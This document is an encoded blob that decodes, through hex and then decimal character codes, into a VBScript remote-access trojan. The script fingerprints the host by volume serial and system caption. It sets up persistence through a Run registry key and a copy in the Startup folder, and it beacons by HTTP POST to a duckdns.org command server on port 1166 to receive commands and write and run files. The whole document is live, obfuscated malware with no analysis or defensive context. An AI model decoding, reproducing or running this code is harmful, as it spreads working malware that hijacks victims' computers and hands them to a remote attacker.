31|34|3A|33|32|3A|31|30|31|3A|39|37|3A|39|39|3A|31|30|34|3A|33|32|3A|39|37|3A|33|32|3A|31|30|35|3A|31|31|30|3A|33|32|3A|39|38|3A|31|33|3A|31|30|3A|31|30|35|3A|31|30|32|3A|33|32|3A|31|30|39|3A|33|32|3A|36|31|3A|33|32|3A|34|39|3A|33|32|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|30|33|3A|31|31|31|3A|36|31|3A|39|37|3A|34|36|3A|31|31|38|3A|31|31|31|3A|31|30|38|3A|31|31|37|3A|31|30|39|3A|31|30|31|3A|31|31|35|3A|31|30|31|3A|31|31|34|3A|31|30|35|3A|39|37|3A|31|30|38|3A|31|31|30|3A|31|31|37|3A|31|30|39|3A|39|38|3A|31|30|31|3A|31|31|34|3A|31|33|3A|31|30|3A|31|30|31|3A|31|30|38|3A|31|31|35|3A|31|30|31|3A|31|30|35|3A|31|30|32|3A|33|32|3A|31|30|39|3A|33|32|3A|36|31|3A|33|32|3A|35|30|3A|33|32|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|30|33|3A|31|31|31|3A|36|31|3A|39|37|3A|34|36|3A|39|39|3A|39|37|3A|31|31|32|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|35|3A|31|30|32|3A|31|33|3A|31|30|3A|31|30|31|3A|31|32|30|3A|31|30|35|3A|31|31|36|3A|33|32|3A|31|30|32|3A|31|31|31|3A|31|31|34|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|35|3A|31|30|32|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|32|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|32|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|31|39|3A|33|32|3A|36|31|3A|33|32|3A|38|37|3A|38|33|3A|39|39|3A|31|31|34|3A|31|30|35|3A|31|31|32|3A|31|31|36|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|31|35|3A|31|30|34|3A|33|32|3A|36|31|3A|33|32|3A|36|37|3A|31|31|34|3A|34|30|3A|34|38|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|30|32|3A|31|31|35|3A|33|32|3A|36|31|3A|33|32|3A|36|37|3A|31|31|34|3A|34|30|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|37|30|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|32|3A|36|37|3A|31|31|34|3A|34|30|3A|37|38|3A|34|31|3A|31|33|3A|31|30|3A|38|33|3A|31|30|31|3A|31|31|36|3A|33|32|3A|36|37|3A|31|31|34|3A|33|32|3A|36|31|3A|33|32|3A|36|37|3A|31|31|34|3A|31|30|31|3A|39|37|3A|31|31|36|3A|31|30|31|3A|37|39|3A|39|38|3A|31|30|36|3A|31|30|31|3A|39|39|3A|31|31|36|3A|34|30|3A|31|30|36|3A|34|30|3A|37|38|3A|34|31|3A|34|31|3A|31|33|3A|31|30|3A|36|39|3A|31|31|30|3A|31|30|30|3A|33|32|3A|37|30|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|32|3A|36|39|3A|31|32|30|3A|34|30|3A|31|31|35|3A|34|31|3A|31|33|3A|31|30|3A|36|39|3A|31|32|30|3A|33|32|3A|36|31|3A|33|32|3A|31|31|35|3A|31|30|34|3A|34|36|3A|36|39|3A|31|32|30|3A|31|31|32|3A|39|37|3A|31|31|30|3A|31|30|30|3A|36|39|3A|31|31|30|3A|31|31|38|3A|31|30|35|3A|31|31|34|3A|31|31|31|3A|31|31|30|3A|31|30|39|3A|31|30|31|3A|31|31|30|3A|31|31|36|3A|38|33|3A|31|31|36|3A|31|31|34|3A|31|30|35|3A|31|31|30|3A|31|30|33|3A|31|31|35|3A|34|30|3A|33|34|3A|33|37|3A|33|34|3A|33|38|3A|31|31|35|3A|33|38|3A|33|34|3A|33|37|3A|33|34|3A|34|31|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|32|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|32|3A|38|30|3A|31|31|36|3A|34|30|3A|36|37|3A|34|34|3A|36|35|3A|34|31|3A|31|33|3A|31|30|3A|38|30|3A|31|31|36|3A|36|31|3A|33|34|3A|33|34|3A|31|33|3A|31|30|3A|38|33|3A|31|30|31|3A|31|31|36|3A|33|32|3A|38|38|3A|36|31|3A|36|37|3A|31|31|34|3A|34|30|3A|35|31|3A|34|31|3A|31|33|3A|31|30|3A|38|38|3A|34|36|3A|37|39|3A|31|31|32|3A|31|30|31|3A|31|31|30|3A|33|32|3A|33|34|3A|38|30|3A|37|39|3A|38|33|3A|38|34|3A|33|34|3A|34|34|3A|33|34|3A|31|30|34|3A|31|31|36|3A|31|31|36|3A|31|31|32|3A|35|38|3A|34|37|3A|34|37|3A|39|39|3A|31|30|38|3A|31|30|35|3A|31|30|31|3A|31|31|30|3A|31|31|36|3A|31|31|35|3A|31|31|35|3A|31|30|38|3A|31|30|32|3A|31|31|34|3A|31|30|30|3A|31|31|31|3A|31|31|30|3A|34|36|3A|31|30|30|3A|31|31|37|3A|39|39|3A|31|30|37|3A|31|30|30|3A|31|31|30|3A|31|31|35|3A|34|36|3A|31|31|31|3A|31|31|34|3A|31|30|33|3A|35|38|3A|34|39|3A|34|39|3A|35|34|3A|35|34|3A|34|37|3A|33|34|3A|33|38|3A|36|37|3A|34|34|3A|31|30|32|3A|39|37|3A|31|30|38|3A|31|31|35|3A|31|30|31|3A|31|33|3A|31|30|3A|38|38|3A|34|36|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|31|31|34|3A|31|30|31|3A|31|31|33|3A|31|31|37|3A|31|30|31|3A|31|31|35|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|39|37|3A|31|30|30|3A|31|30|31|3A|31|31|34|3A|33|32|3A|33|34|3A|38|35|3A|31|31|35|3A|31|30|31|3A|31|31|34|3A|34|35|3A|36|35|3A|31|30|33|3A|31|30|31|3A|31|31|30|3A|31|31|36|3A|35|38|3A|33|34|3A|34|34|3A|31|31|30|3A|31|30|32|3A|31|33|3A|31|30|3A|38|38|3A|34|36|3A|31|31|35|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|36|35|3A|31|33|3A|31|30|3A|38|30|3A|31|31|36|3A|36|31|3A|38|38|3A|34|36|3A|31|31|34|3A|31|30|31|3A|31|31|35|3A|31|31|32|3A|31|31|31|3A|31|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|32|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|37|30|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|32|3A|31|31|30|3A|31|30|32|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|32|3A|36|31|3A|33|34|3A|33|34|3A|31|33|3A|31|30|3A|31|30|35|3A|36|31|3A|31|30|33|3A|31|31|31|3A|34|30|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|36|31|3A|38|36|3A|37|38|3A|33|32|3A|33|38|3A|33|32|3A|33|34|3A|39|35|3A|33|34|3A|33|32|3A|33|38|3A|33|32|3A|31|30|35|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|32|3A|36|31|3A|31|31|30|3A|31|30|32|3A|33|38|3A|31|31|35|3A|33|38|3A|39|39|3A|31|33|3A|31|30|3A|31|31|35|3A|36|31|3A|31|30|31|3A|31|32|30|3A|34|30|3A|33|34|3A|36|37|3A|37|39|3A|37|37|3A|38|30|3A|38|35|3A|38|34|3A|36|39|3A|38|32|3A|37|38|3A|36|35|3A|37|37|3A|36|39|3A|33|34|3A|34|31|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|32|3A|36|31|3A|31|31|30|3A|31|30|32|3A|33|38|3A|31|31|35|3A|33|38|3A|39|39|3A|31|33|3A|31|30|3A|31|31|35|3A|36|31|3A|31|30|31|3A|31|32|30|3A|34|30|3A|33|34|3A|38|35|3A|38|33|3A|36|39|3A|38|32|3A|37|38|3A|36|35|3A|37|37|3A|36|39|3A|33|34|3A|34|31|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|32|3A|36|31|3A|31|31|30|3A|31|30|32|3A|33|38|3A|31|31|35|3A|33|38|3A|39|39|3A|31|33|3A|31|30|3A|31|31|35|3A|36|31|3A|31|30|33|3A|31|31|31|3A|34|30|3A|35|30|3A|34|31|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|32|3A|36|31|3A|31|31|30|3A|31|30|32|3A|33|38|3A|31|31|35|3A|33|38|3A|39|39|3A|31|33|3A|31|30|3A|31|31|35|3A|36|31|3A|31|30|33|3A|31|31|31|3A|34|30|3A|35|32|3A|34|31|3A|31|33|3A|31|30|3A|31|31|30|3A|31|30|32|3A|36|31|3A|31|31|30|3A|31|30|32|3A|33|38|3A|31|31|35|3A|33|38|3A|39|39|3A|33|38|3A|39|39|3A|33|38|3A|31|31|30|3A|31|31|36|3A|33|38|3A|39|39|3A|33|38|3A|31|31|37|3A|33|38|3A|39|39|3A|31|33|3A|31|30|3A|36|39|3A|31|31|30|3A|31|30|30|3A|33|32|3A|37|30|3A|31|31|37|3A|31|31|30|3A|39|39|3A|31|31|36|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|38|33|3A|31|31|37|3A|39|38|3A|33|32|3A|37|38|3A|31|31|35|3A|31|33|3A|31|30|3A|31|31|31|3A|31|31|30|3A|33|32|3A|31|30|31|3A|31|31|34|3A|31|31|34|3A|31|31|31|3A|31|31|34|3A|33|32|3A|31|31|34|3A|31|30|31|3A|31|31|35|3A|31|31|37|3A|31|30|39|3A|31|30|31|3A|33|32|3A|31|31|30|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|31|33|3A|31|30|3A|31|30|30|3A|31|31|34|3A|36|31|3A|31|30|31|3A|31|32|30|3A|34|30|3A|33|34|3A|38|35|3A|31|31|35|3A|31|30|31|3A|31|31|34|3A|38|30|3A|31|31|34|3A|31|31|31|3A|31|30|32|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|33|34|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|36|37|3A|33|32|3A|33|38|3A|33|32|3A|31|31|39|3A|31|31|30|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|35|3A|34|36|3A|36|37|3A|31|31|31|3A|31|31|32|3A|31|32|31|3A|37|30|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|33|32|3A|31|30|32|3A|31|31|37|3A|34|34|3A|31|30|30|3A|31|31|34|3A|34|34|3A|31|31|36|3A|31|31|34|3A|31|31|37|3A|31|30|31|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|34|3A|34|36|3A|31|31|34|3A|31|30|31|3A|31|30|33|3A|31|31|39|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|30|33|3A|34|30|3A|34|38|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|31|30|33|3A|34|30|3A|35|31|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|33|34|3A|38|38|3A|38|33|3A|35|35|3A|37|35|3A|37|34|3A|37|32|3A|38|32|3A|37|35|3A|36|36|3A|35|34|3A|33|34|3A|34|34|3A|33|32|3A|36|37|3A|31|30|34|3A|33|32|3A|33|38|3A|33|32|3A|31|30|30|3A|31|31|34|3A|33|32|3A|33|38|3A|33|32|3A|36|37|3A|31|30|34|3A|34|34|3A|33|32|3A|31|30|33|3A|34|30|3A|35|33|3A|34|31|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|35|3A|34|36|3A|39|39|3A|31|31|31|3A|31|31|32|3A|31|32|31|3A|31|30|32|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|33|32|3A|31|30|32|3A|31|31|37|3A|34|34|3A|33|32|3A|36|37|3A|31|31|34|3A|34|30|3A|35|30|3A|34|31|3A|34|36|3A|37|38|3A|39|37|3A|31|30|39|3A|31|30|31|3A|38|33|3A|31|31|32|3A|39|37|3A|39|39|3A|31|30|31|3A|34|30|3A|33|38|3A|37|32|3A|35|35|3A|34|31|3A|34|36|3A|38|33|3A|31|30|31|3A|31|30|38|3A|31|30|32|3A|34|36|3A|38|30|3A|39|37|3A|31|31|36|3A|31|30|34|3A|33|32|3A|33|38|3A|36|37|3A|33|32|3A|33|38|3A|33|32|3A|31|31|39|3A|31|31|30|3A|33|32|3A|34|34|3A|31|31|36|3A|31|31|34|3A|31|31|37|3A|31|30|31|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|38|33|3A|31|31|37|3A|39|38|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|30|30|3A|31|31|34|3A|36|31|3A|31|30|31|3A|31|32|30|3A|34|30|3A|33|34|3A|38|35|3A|31|31|35|3A|31|30|31|3A|31|31|34|3A|38|30|3A|31|31|34|3A|31|31|31|3A|31|30|32|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|33|34|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|36|37|3A|33|32|3A|33|38|3A|33|32|3A|31|31|39|3A|31|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|31|31|38|3A|31|31|30|3A|36|31|3A|33|34|3A|39|39|3A|31|31|31|3A|31|31|30|3A|31|31|30|3A|31|30|31|3A|31|32|30|3A|31|30|35|3A|31|31|31|3A|31|31|30|3A|33|34|3A|31|33|3A|31|30|3A|38|35|3A|36|31|3A|33|34|3A|33|34|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|39|39|3A|31|30|34|3A|33|32|3A|36|31|3A|33|32|3A|39|39|3A|31|30|34|3A|31|31|34|3A|31|31|39|3A|34|30|3A|35|31|3A|35|32|3A|34|31|3A|31|33|3A|31|30|3A|39|39|3A|33|32|3A|36|31|3A|33|32|3A|39|39|3A|31|30|34|3A|31|31|34|3A|31|31|39|3A|34|30|3A|35|37|3A|35|30|3A|34|31|3A|31|33|3A|31|30|3A|31|30|32|3A|31|31|37|3A|33|32|3A|36|31|3A|33|32|3A|31|31|39|3A|34|36|3A|31|31|35|3A|39|39|3A|31|31|34|3A|31|30|35|3A|31|31|32|3A|31|31|36|3A|31|30|32|3A|31|31|37|3A|31|30|38|3A|31|30|38|3A|31|31|30|3A|39|37|3A|31|30|39|3A|31|30|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|30|3A|36|31|3A|31|31|39|3A|34|36|3A|31|31|35|3A|39|39|3A|31|31|34|3A|31|30|35|3A|31|31|32|3A|31|31|36|3A|31|31|30|3A|39|37|3A|31|30|39|3A|31|30|31|3A|31|33|3A|31|30|3A|37|38|3A|38|34|3A|36|31|3A|33|34|3A|37|38|3A|31|31|31|3A|33|34|3A|31|33|3A|31|30|3A|31|30|35|3A|31|30|32|3A|33|32|3A|31|30|32|3A|31|31|35|3A|34|36|3A|31|30|32|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|31|30|31|3A|31|32|30|3A|31|30|35|3A|31|31|35|3A|31|31|36|3A|31|31|35|3A|34|30|3A|31|30|31|3A|31|32|30|3A|34|30|3A|33|34|3A|38|37|3A|31|30|35|3A|31|31|30|3A|31|30|30|3A|31|30|35|3A|31|31|34|3A|33|34|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|33|34|3A|39|32|3A|37|37|3A|31|30|35|3A|39|39|3A|31|31|34|3A|31|31|31|3A|31|31|35|3A|31|31|31|3A|31|30|32|3A|31|31|36|3A|34|36|3A|37|38|3A|36|39|3A|38|34|3A|39|32|3A|37|30|3A|31|31|34|3A|39|37|3A|31|30|39|3A|31|30|31|3A|31|31|39|3A|31|31|31|3A|31|31|34|3A|31|30|37|3A|39|32|3A|31|31|38|3A|35|30|3A|34|36|3A|34|38|3A|34|36|3A|35|33|3A|34|38|3A|35|35|3A|35|30|3A|35|35|3A|39|32|3A|31|31|38|3A|39|38|3A|39|39|3A|34|36|3A|31|30|31|3A|31|32|30|3A|31|30|31|3A|33|34|3A|34|31|3A|33|32|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|31|31|30|3A|31|33|3A|31|30|3A|37|38|3A|38|34|3A|36|31|3A|33|34|3A|38|39|3A|31|30|31|3A|31|31|35|3A|33|34|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|35|3A|31|30|32|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|38|35|3A|36|31|3A|33|32|3A|31|31|35|3A|31|30|34|3A|34|36|3A|31|31|34|3A|31|30|31|3A|31|30|33|3A|31|31|34|3A|31|30|31|3A|39|37|3A|31|30|30|3A|34|30|3A|31|30|33|3A|34|30|3A|35|30|3A|34|31|3A|34|31|3A|31|33|3A|31|30|3A|31|30|35|3A|31|30|32|3A|33|32|3A|38|35|3A|36|31|3A|33|34|3A|33|34|3A|33|32|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|31|31|30|3A|31|33|3A|31|30|3A|31|30|35|3A|31|30|32|3A|33|32|3A|31|30|39|3A|31|30|35|3A|31|30|30|3A|34|30|3A|31|30|32|3A|31|31|37|3A|34|34|3A|35|30|3A|34|31|3A|36|31|3A|33|34|3A|35|38|3A|39|32|3A|33|34|3A|33|32|3A|33|38|3A|33|32|3A|31|31|39|3A|31|31|30|3A|33|32|3A|31|31|36|3A|31|30|34|3A|31|30|31|3A|31|31|30|3A|31|33|3A|31|30|3A|38|35|3A|36|31|3A|33|34|3A|38|34|3A|38|32|3A|38|35|3A|36|39|3A|33|34|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|34|3A|34|36|3A|31|31|34|3A|31|30|31|3A|31|30|33|3A|31|31|39|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|30|33|3A|34|30|3A|35|30|3A|34|31|3A|34|34|3A|33|32|3A|38|35|3A|34|34|3A|33|32|3A|31|30|33|3A|34|30|3A|35|33|3A|34|31|3A|31|33|3A|31|30|3A|31|30|31|3A|31|30|38|3A|31|31|35|3A|31|30|31|3A|31|33|3A|31|30|3A|38|35|3A|36|31|3A|33|34|3A|37|30|3A|36|35|3A|37|36|3A|38|33|3A|36|39|3A|33|34|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|34|3A|34|36|3A|31|31|34|3A|31|30|31|3A|31|30|33|3A|31|31|39|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|30|33|3A|34|30|3A|35|30|3A|34|31|3A|34|34|3A|33|32|3A|38|35|3A|34|34|3A|33|32|3A|31|30|33|3A|34|30|3A|35|33|3A|34|31|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|35|3A|31|30|32|3A|31|33|3A|31|30|3A|31|30|31|3A|31|31|30|3A|31|30|30|3A|33|32|3A|31|30|35|3A|31|30|32|3A|31|33|3A|31|30|3A|31|33|3A|31|30|3A|37|38|3A|31|31|35|3A|31|33|3A|31|30|3A|31|31|35|3A|31|31|32|3A|31|30|38|3A|36|31|3A|33|34|3A|31|32|34|3A|38|36|3A|31|32|34|3A|33|34|3A|31|33|3A|31|30|3A|31|31|39|3A|31|30|34|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|33|32|3A|31|31|36|3A|31|31|34|3A|31|31|37|3A|31|30|31|3A|31|33|3A|31|30|3A|31|31|35|3A|36|31|3A|31|31|35|3A|31|31|32|3A|31|30|38|3A|31|30|35|3A|31|31|36|3A|34|30|3A|38|30|3A|31|31|36|3A|34|30|3A|33|34|3A|38|36|3A|31|31|34|3A|31|30|31|3A|33|34|3A|34|34|3A|33|34|3A|33|34|3A|34|31|3A|34|34|3A|31|31|35|3A|31|31|32|3A|31|30|38|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|30|38|3A|31|30|31|3A|39|39|3A|31|31|36|3A|33|32|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|31|31|35|3A|34|30|3A|34|38|3A|34|31|3A|31|33|3A|31|30|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|33|34|3A|31|30|31|3A|31|32|30|3A|39|39|3A|33|34|3A|31|33|3A|31|30|3A|31|31|35|3A|39|37|3A|36|31|3A|33|32|3A|31|31|35|3A|34|30|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|30|31|3A|31|32|30|3A|31|30|31|3A|39|39|3A|31|31|37|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|31|35|3A|39|37|3A|31|33|3A|31|30|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|33|34|3A|38|33|3A|39|39|3A|33|34|3A|31|33|3A|31|30|3A|31|31|35|3A|35|30|3A|33|32|3A|36|31|3A|33|32|3A|36|39|3A|31|32|30|3A|34|30|3A|33|34|3A|31|31|36|3A|31|30|31|3A|31|30|39|3A|31|31|32|3A|33|34|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|33|34|3A|39|32|3A|33|34|3A|33|32|3A|33|38|3A|33|32|3A|31|31|35|3A|34|30|3A|35|30|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|31|39|3A|31|31|34|3A|33|32|3A|36|31|3A|33|32|3A|31|30|32|3A|31|31|35|3A|34|36|3A|37|39|3A|31|31|32|3A|31|30|31|3A|31|31|30|3A|38|34|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|37|30|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|34|30|3A|31|31|35|3A|35|30|3A|34|34|3A|35|30|3A|34|34|3A|38|34|3A|31|31|34|3A|31|31|37|3A|31|30|31|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|38|37|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|31|35|3A|34|30|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|36|37|3A|31|30|38|3A|31|31|31|3A|31|31|35|3A|31|30|31|3A|34|30|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|34|3A|34|36|3A|31|31|34|3A|31|31|37|3A|31|31|30|3A|33|32|3A|31|31|35|3A|35|30|3A|34|34|3A|33|32|3A|35|34|3A|31|33|3A|31|30|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|33|34|3A|38|32|3A|37|30|3A|33|34|3A|31|33|3A|31|30|3A|31|31|35|3A|35|30|3A|33|32|3A|36|31|3A|33|32|3A|36|39|3A|31|32|30|3A|34|30|3A|33|34|3A|31|31|36|3A|31|30|31|3A|31|30|39|3A|31|31|32|3A|33|34|3A|34|31|3A|33|32|3A|33|38|3A|33|32|3A|33|34|3A|39|32|3A|33|34|3A|33|32|3A|33|38|3A|33|32|3A|31|31|35|3A|34|30|3A|35|30|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|31|39|3A|31|31|34|3A|33|32|3A|36|31|3A|33|32|3A|31|30|32|3A|31|31|35|3A|34|36|3A|37|39|3A|31|31|32|3A|31|30|31|3A|31|31|30|3A|38|34|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|37|30|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|34|30|3A|31|31|35|3A|35|30|3A|34|34|3A|35|30|3A|34|34|3A|38|34|3A|31|31|34|3A|31|31|37|3A|31|30|31|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|38|37|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|31|35|3A|34|30|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|36|37|3A|31|30|38|3A|31|31|31|3A|31|31|35|3A|31|30|31|3A|34|30|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|34|3A|34|36|3A|31|31|34|3A|31|31|37|3A|31|31|30|3A|33|32|3A|31|31|35|3A|35|30|3A|31|33|3A|31|30|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|33|34|3A|38|32|3A|31|30|31|3A|31|31|30|3A|33|34|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|31|39|3A|31|31|34|3A|33|32|3A|36|31|3A|33|32|3A|31|30|32|3A|31|31|35|3A|34|36|3A|37|39|3A|31|31|32|3A|31|30|31|3A|31|31|30|3A|38|34|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|37|30|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|34|30|3A|31|30|32|3A|31|31|37|3A|34|34|3A|34|39|3A|34|31|3A|31|33|3A|31|30|3A|31|30|32|3A|33|32|3A|36|31|3A|33|32|3A|31|31|39|3A|31|31|34|3A|34|36|3A|38|32|3A|31|30|31|3A|39|37|3A|31|30|30|3A|36|35|3A|31|30|38|3A|31|30|38|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|39|39|3A|31|30|38|3A|31|31|31|3A|31|31|35|3A|31|30|31|3A|34|30|3A|34|31|3A|31|33|3A|31|30|3A|31|30|32|3A|33|32|3A|36|31|3A|33|32|3A|31|31|34|3A|31|30|31|3A|31|31|32|3A|31|30|38|3A|39|37|3A|39|39|3A|31|30|31|3A|34|30|3A|31|30|32|3A|34|34|3A|39|39|3A|31|30|34|3A|33|38|3A|31|31|38|3A|31|31|30|3A|33|38|3A|39|39|3A|31|30|34|3A|34|34|3A|39|39|3A|31|30|34|3A|33|38|3A|31|31|35|3A|34|30|3A|34|39|3A|34|31|3A|33|38|3A|39|39|3A|31|30|34|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|31|39|3A|31|31|34|3A|33|32|3A|36|31|3A|33|32|3A|31|30|32|3A|31|31|35|3A|34|36|3A|37|39|3A|31|31|32|3A|31|30|31|3A|31|31|30|3A|38|34|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|37|30|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|34|30|3A|31|30|32|3A|31|31|37|3A|34|34|3A|35|30|3A|34|34|3A|31|30|32|3A|39|37|3A|31|30|38|3A|31|31|35|3A|31|30|31|3A|34|31|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|38|37|3A|31|31|34|3A|31|30|35|3A|31|31|36|3A|31|30|31|3A|33|32|3A|31|30|32|3A|31|33|3A|31|30|3A|31|31|39|3A|31|31|34|3A|34|36|3A|39|39|3A|31|30|38|3A|31|31|31|3A|31|31|35|3A|31|30|31|3A|34|30|3A|34|31|3A|31|33|3A|31|30|3A|39|39|3A|39|37|3A|31|31|35|3A|31|30|31|3A|33|32|3A|33|34|3A|38|35|3A|31|31|32|3A|33|34|3A|31|33|3A|31|30|3A|31|31|35|3A|31|30|31|3A|31|31|36|3A|33|32|3A|31|31|39|3A|31|31|34|3A|33|32|3A|36|31|3A|33|32|3A|31|30|32|3A|31|31|35|3A|34|36|3A|37|39|3A|31|31|32|3A|31|30|31|3A|31|31|30|3A|38|34|3A|31|30|31|3A|31|32|30|3A|31|31|36|3A|37|30|3A|31|30|35|3A|31|30|38|3A|31|30|31|3A|34|30|3A|31|30|32|3A|31|31|37|3A|34|34|3A|35|30|3A|34|34|3A|31|30|32|3A|39|37|3A|31|30|38|3A|31|31|35|3A|31|30|31|3A|34|31|3A|31|33|3A|31|30|3A|31|31|35|3A|34|30|3A|34|39|3A|34|31|3A|33|32|3A|36|31|3A|33|32|3A|31|31|34|3A|31|30|31|3A|31|31|32|3A|31|30|38|3